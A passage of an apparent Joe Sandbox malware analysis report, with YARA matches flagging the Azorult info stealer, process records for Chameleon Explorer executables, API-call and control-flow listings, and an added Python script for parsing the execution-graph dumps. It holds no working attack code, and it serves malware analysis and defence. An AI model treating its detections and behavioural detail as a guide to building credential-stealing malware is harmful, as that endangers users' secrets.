                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Azorult_1, Description: Azorult Payload, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:20:27:53
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:23
                                                                                                          Start time:20:27:53
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:21%
                                                                                                            Total number of Nodes:167
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph: [graph rendering residue; the node/edge dump is not reproduced. Recoverable API names from the graph nodes: DecodePointer, EncodePointer, RtlAllocateHeap, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetProcAddress, ExitProcess, LoadLibraryExW, GetLastError, SetLastError, OutputDebugStringW, GetCurrentThreadId, TlsGetValue, TlsSetValue, Sleep, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter]

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040594C: __FF_MSGBANNER.LIBCMT ref: 00405963
                                                                                                              • Part of subcall function 0040594C: __NMSG_WRITE.LIBCMT ref: 0040596A
                                                                                                              • Part of subcall function 0040594C: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,?,?,?,00401013,?), ref: 0040598F
                                                                                                            • std::exception::exception.LIBCMT ref: 0040102C
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401041
                                                                                                              • Part of subcall function 004087DB: RaiseException.KERNEL32(?,?,?,0049BAF8,00000000,?,?,?,?,00401046,?,0049BAF8,?,00000001), ref: 00408830
                                                                                                            Memory Dump Source
                                                                                                             • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                            • String ID: 9I
                                                                                                            • API String ID: 3902256705-3853901842
                                                                                                            • Opcode ID: c9d396497a545f0b994946cb6a19f0fa4b416b31df0d7e9fefe9fe323cb7b39c
                                                                                                            • Instruction ID: c31501622222a32f1cc2e59b1f1168e3eda5d1aefb4f8aaef276fead88a914f0
                                                                                                            • Opcode Fuzzy Hash: c9d396497a545f0b994946cb6a19f0fa4b416b31df0d7e9fefe9fe323cb7b39c
                                                                                                            • Instruction Fuzzy Hash: 95F0F934500319A6CB20AA59EE019DF7BACDF00354F10443FF888B26E1DFB98A8096DD

                                                                                                             Control-flow Graph

                                                                                                             • Single basic block 004032DF-004032EE: call 004032AB (___crtCorExitProcess), then ExitProcess.
                                                                                                            APIs
                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 004032E5
                                                                                                              • Part of subcall function 004032AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,004032EA,00401013,?,00405979,000000FF,0000001E,00000000,?,?,?,00401013), ref: 004032BA
                                                                                                              • Part of subcall function 004032AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004032CC
                                                                                                            • ExitProcess.KERNEL32 ref: 004032EE
                                                                                                            Memory Dump Source
                                                                                                             • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2427264223-0
                                                                                                            • Opcode ID: 8b4f6869848d75a34372ea26b092661cfb6a1057c36efb8000ea47b45e7879e4
                                                                                                            • Instruction ID: 4b4b8896e93eb86cbaf3263f340f39ca76a21130d1afdfd58e71558c83f5ac6d
                                                                                                            • Opcode Fuzzy Hash: 8b4f6869848d75a34372ea26b092661cfb6a1057c36efb8000ea47b45e7879e4
                                                                                                            • Instruction Fuzzy Hash: 2DB09230004208BBCB012F12EC0A8483F29FF01A91B004039F80408171EBB6AAD2DA89

                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00408F97,?,?,?,00000000), ref: 0040A39A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040A3A3
                                                                                                            Memory Dump Source
                                                                                                             • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: b622a3df41f8a94f907b7d33d2849a3184b935e67241c561310d77cf32ab1c79
                                                                                                            • Instruction ID: 246f8a8197968ac254506115b5e3a4c1b5c43bbea20d895d4fddf0fa4c866c33
                                                                                                            • Opcode Fuzzy Hash: b622a3df41f8a94f907b7d33d2849a3184b935e67241c561310d77cf32ab1c79
                                                                                                            • Instruction Fuzzy Hash: 23B09231058208ABCA002B91FC09B883F68EB44AA2F404030FA4D84E60FBA254948A9A

                                                                                                            Execution Graph

                                                                                                             Execution Coverage: 1.6%
                                                                                                             Dynamic/Decrypted Code Coverage: 100%
                                                                                                             Signature Coverage: 8.6%
                                                                                                             Total number of Nodes: 327
                                                                                                             Total number of Limit Nodes: 34
                                                                                                             Execution graph, process 2 (cexplorer, image base 03550000); the interactive graph of the original report is reduced here to its content. Entry nodes, with the Win32 APIs reachable from each: 035E988C, a hook callback (CallNextHookEx, PostMessageW); 035F07EC, initialisation and process exit (GetCurrentThreadId, GetVersionExW, GetModuleHandleW, GetModuleFileNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetStdHandle, WriteFile, FreeLibrary, ExitProcess, CreateFileMappingW, GetLastError, MapViewOfFile, UnmapViewOfFile, CloseHandle, DestroyWindow, GetCurrentProcessId, RegisterClassExW, seven RegisterWindowMessageW calls, CreateWindowExW, LoadLibraryW); 0355AFF0 (GetSystemInfo); 0356C760, a version-info query (GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW); 035595FC, a locale lookup (GetModuleFileNameW, LoadLibraryExW, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, IsValidLocale, GetLocaleInfoW, EnterCriticalSection, LeaveCriticalSection, FindFirstFileW, FindClose); 0355B1D8 (TlsGetValue, LocalFree, TlsSetValue, TlsFree); 035537B8 (VirtualAlloc); 03554EA8 (VirtualFree); 035E6900, a window procedure (SetForegroundWindow, AllowSetForegroundWindow, GlobalAddAtomW, GlobalGetAtomNameW, GlobalDeleteAtom, SendMessageTimeoutW, GetLastError, DefWindowProcW). Several subcalls are only summarised by the plugin ("11 API calls", "21 API calls", ...) and their APIs are not named in the dump.
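Joe Sandbox serialises these execution graphs as a flat token stream: `ID ADDR [LABEL ...]` node definitions interleaved with `SRC->DST` edges, where labels are the Win32 APIs a node calls, LIBCMT names the IDA plugin recognised, or counters such as "6 API calls". The following Python is an added example, not code from the Joe Sandbox report or its tooling. It parses that stream, lists the APIs each function reaches, finds the graph entry points from which a given API is reachable, and reports whether LIBCMT-style labels sit next to a call site, which is the check that separates runtime fault handling from a sample's own anti-debug code. It serves both the process-0 and process-2 dumps above. The grammar is inferred from the dumps rather than documented, and the embedded sample is a constructed, cut-down excerpt in the format of the process-0 dump (intermediate nodes collapsed), so its edges are not those of the full graph.

```python
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
HEX_ADDR = re.compile(r"^[0-9a-f]{4,}$")
LABEL_NOISE = {"API", "calls"}  # counter words in summarised nodes ("_malloc 6 API calls")


def parse_execution_graph(text):
    """Return (nodes, edges): nodes = {id: (address, [labels])}, edges = [(src, dst)].

    Grammar inferred from the dumps (Joe Sandbox does not document it): an optional
    leading keyword, then `ID ADDR [LABEL ...]` node definitions and `SRC->DST` edge
    tokens in any order. A label that is itself a 4+ char hex word would be misread.
    """
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok, m = tokens[i], EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (int(tokens[i + 1], 16), [])
            i += 1  # the address token is consumed as well
        elif current is not None:  # anything else is a label of the current node
            nodes[current][1].append(tok)
        i += 1
    return nodes, edges


def is_crt_label(label):
    """LIBCMT-attributed names: leading underscore(s) or a C++ scope operator."""
    return label.startswith("_") or "::" in label


def api_names(labels):
    """Tokens that look like Win32 export names (counters and CRT names dropped)."""
    return [t for t in labels if t not in LABEL_NOISE and not t.isdigit() and not is_crt_label(t)]


def apis_by_function(nodes):
    """{address: [api, ...]} for every node whose label names at least one API."""
    out = {}
    for addr, labels in nodes.values():
        apis = api_names(labels)
        if apis:
            out.setdefault(addr, []).extend(apis)
    return out


def all_apis(nodes):
    return sorted({api for apis in apis_by_function(nodes).values() for api in apis})


def entry_points(nodes, edges):
    """Node ids with no incoming edge: where the sandbox saw execution enter the graph."""
    targets = {dst for _, dst in edges}
    return sorted(nid for nid in nodes if nid not in targets)


def nodes_reaching(nodes, edges, api, max_depth=None):
    """Ids of nodes from which a node labelled `api` is reachable (reverse BFS, optionally bounded)."""
    rev = defaultdict(list)
    for src, dst in edges:
        rev[dst].append(src)
    targets = [nid for nid, (_, labels) in nodes.items() if api in labels]
    seen, queue = set(targets), deque((nid, 0) for nid in targets)
    while queue:
        nid, depth = queue.popleft()
        if max_depth is not None and depth >= max_depth:
            continue
        for pred in rev[nid]:
            if pred not in seen:
                seen.add(pred)
                queue.append((pred, depth + 1))
    return seen


def entry_points_reaching(nodes, edges, api):
    """Addresses of the entry points from which `api` is eventually called."""
    reach = nodes_reaching(nodes, edges, api)
    return sorted(nodes[nid][0] for nid in entry_points(nodes, edges) if nid in reach)


def crt_labels_near(nodes, edges, api, depth=2):
    """LIBCMT-style names within `depth` predecessor hops of every `api` call site.

    Non-empty means the call sits on a path the plugin attributes to the C runtime;
    empty only means no such label is that close, not that the code is custom.
    """
    near = nodes_reaching(nodes, edges, api, max_depth=depth)
    return sorted({lab for nid in near for lab in nodes.get(nid, (0, []))[1] if is_crt_label(lab)})


# Constructed sample: the token format of the process-0 dump above, but cut down and with
# intermediate nodes collapsed, so it illustrates the format rather than copying the graph.
SAMPLE = """execution_graph 490 3e1cbf 491 3e1ccf 490->491 494 3e1ce7 491->494 495 400ff6 491->495
493 41bd01 498 400ffe 495->498 497 401018 497->493 498->497 500 40101c std::exception::exception 498->500
503 40594c 498->503 520 4035e1 DecodePointer 498->520 522 4087db 500->522 502 401046 502->493
513 405958 503->513 509 40598b RtlAllocateHeap 509->513 513->509 525 40a3ab 513->525
570 415097 525->570 572 408d68 _malloc 6 API calls 570->572 521 4035f4 520->521 521->498
524 4087fa RaiseException 522->524 524->502 592 408e99 572->592
593 408eb3 ___raise_securityfailure __call_reportfault 592->593 594 408ed3 IsDebuggerPresent 593->594
600 40a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 594->600 597 408f97 ___raise_securityfailure 600->597
691 40800a 694 4150d7 691->694 693 40800f 693->693
695 415107 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 694->695 697 4150fe 695->697 697->693"""

if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print(len(nodes), "nodes,", len(edges), "edges; entry points:", [hex(nodes[n][0]) for n in entry_points(nodes, edges)])
    for addr, apis in sorted(apis_by_function(nodes).items()):
        print(f"  {addr:08x}: {', '.join(apis)}")
    for api in ("IsDebuggerPresent", "QueryPerformanceCounter"):
        print(api, "reached from", [hex(a) for a in entry_points_reaching(nodes, edges, api)],
              "- CRT labels nearby:", crt_labels_near(nodes, edges, api))
```

On the sample, IsDebuggerPresent is reachable only from the 003E1CBF entry and its two nearest labelled predecessors are ___raise_securityfailure and __call_reportfault, while RtlAllocateHeap has no CRT label within two hops; the same queries run unchanged on a full dump pasted into SAMPLE. Nodes that share an address (the dump lists 00409006 twice, once as IsProcessorFeaturePresent and once as __invoke_watson) are merged by apis_by_function, and edges that point at nodes missing from a trimmed excerpt are tolerated.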

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0355A6FC,?,?), ref: 0355A66E
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0355A6FC,?,?), ref: 0355A677
                                                                                                              • Part of subcall function 0355A504: FindFirstFileW.KERNEL32(00000000,?,00000000,0355A562,?,00000001), ref: 0355A537
                                                                                                              • Part of subcall function 0355A504: FindClose.KERNEL32(00000000,00000000,?,00000000,0355A562,?,00000001), ref: 0355A547
                                                                                                            Memory Dump Source
                                                                                                             • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3216391948-0
                                                                                                            • Opcode ID: 006f578be5ced7e61e590725e4734bf7994ddf658c6ed0ef26ae25c63cd698f4
                                                                                                            • Instruction ID: e0c4849625ee1a03b03ccb28344e5adf4f229f36c0d3f14049de246b4a74397e
                                                                                                            • Opcode Fuzzy Hash: 006f578be5ced7e61e590725e4734bf7994ddf658c6ed0ef26ae25c63cd698f4
                                                                                                            • Instruction Fuzzy Hash: 5E116378A0034A9BDF05EF94E861AADB7B8FF88300F504166BD05AB261DB747E04D665

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0355A562,?,00000001), ref: 0355A537
                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0355A562,?,00000001), ref: 0355A547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 7abacd5bd0885bbfcd42fd1a17623bd31bf2f374a6dbbc732200a3a848463af6
                                                                                                            • Instruction ID: 0bf278109e2fa9a963c8f97fceaf2e6d54014c468eb32bae451407057779a276
                                                                                                            • Opcode Fuzzy Hash: 7abacd5bd0885bbfcd42fd1a17623bd31bf2f374a6dbbc732200a3a848463af6
                                                                                                            • Instruction Fuzzy Hash: 01F08279504705AFCB11EF78EC61D5EB7BCFB89610B9006A2BC18D7561E634BF109514
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                            • Instruction ID: b4e355f2f9599de24e75dc8c69876a67925a3c7d35b76253fc8028500c2a2d94
                                                                                                            • Opcode Fuzzy Hash: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                            • Instruction Fuzzy Hash: 6DA012184085014BC804EB185C4250F72902A80010FC80610785C99291FA05957482D7

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,035E6FA7,?,00000000,035E7016), ref: 035E6E28
                                                                                                            • RegisterClassExW.USER32(00000030), ref: 035E6E96
                                                                                                              • Part of subcall function 0355C400: CreateWindowExW.USER32(000000A0,00000000,?,00000000,00000000,035E6FA7,?,00000000,035E7016,?,?,?), ref: 0355C43F
                                                                                                            • RegisterWindowMessageW.USER32(WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,00000000,00000000,00000000,035E6FA7,?,00000000), ref: 035E6ED4
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,00000000,00000000,00000000), ref: 035E6EF0
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000), ref: 035E6F0C
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000), ref: 035E6F28
                                                                                                            • RegisterWindowMessageW.USER32(WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000), ref: 035E6F44
                                                                                                            • RegisterWindowMessageW.USER32(WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder), ref: 035E6F60
                                                                                                            • RegisterWindowMessageW.USER32(WM_HOOK_WINDOW by Chameleon Folder,?,00000001,WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder), ref: 035E6F7C
                                                                                                            • LoadLibraryW.KERNEL32(Folder.dll,?,00000001,WM_HOOK_WINDOW by Chameleon Folder,?,00000001,WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder), ref: 035E6F98
                                                                                                            Strings
                                                                                                            • WM_HOOK_WINDOW by Chameleon Folder, xrefs: 035E6F77
                                                                                                            • 0, xrefs: 035E6E49
                                                                                                            • ChameleonFolderHelper, xrefs: 035E6E3F
                                                                                                            • WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 035E6F23
                                                                                                            • WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 035E6F07
                                                                                                            • WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 035E6EEB
                                                                                                            • WM_HOOK_LOG by Chameleon Folder, xrefs: 035E6F5B
                                                                                                            • WM_DIALOG_YPS by Chameleon Folder, xrefs: 035E6F3F
                                                                                                            • WM_SET_FOREGROUND by Chameleon Folder, xrefs: 035E6ECF
                                                                                                            • Folder.dll, xrefs: 035E6F93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: RegisterWindow$Message$ClassCreateCurrentLibraryLoadProcess
                                                                                                            • String ID: 0$ChameleonFolderHelper$Folder.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
                                                                                                            • API String ID: 423585798-665509755
                                                                                                            • Opcode ID: b7c640d08c858675c8c9bd0a371aafee0e41ef49aa18b3fc795821dacb4e4d95
                                                                                                            • Instruction ID: 46e42ca9b2fb45e0ec2dac97fa9206e97d41ab9a92581d12f2657cb2510c800c
                                                                                                            • Opcode Fuzzy Hash: b7c640d08c858675c8c9bd0a371aafee0e41ef49aa18b3fc795821dacb4e4d95
                                                                                                            • Instruction Fuzzy Hash: 54516D74A00709AED708EFB4E891F9E77F8FB98704F514426F810EB275E771A9059B50

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A34D,?,?), ref: 0355A161
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D,?,?), ref: 0355A1AA
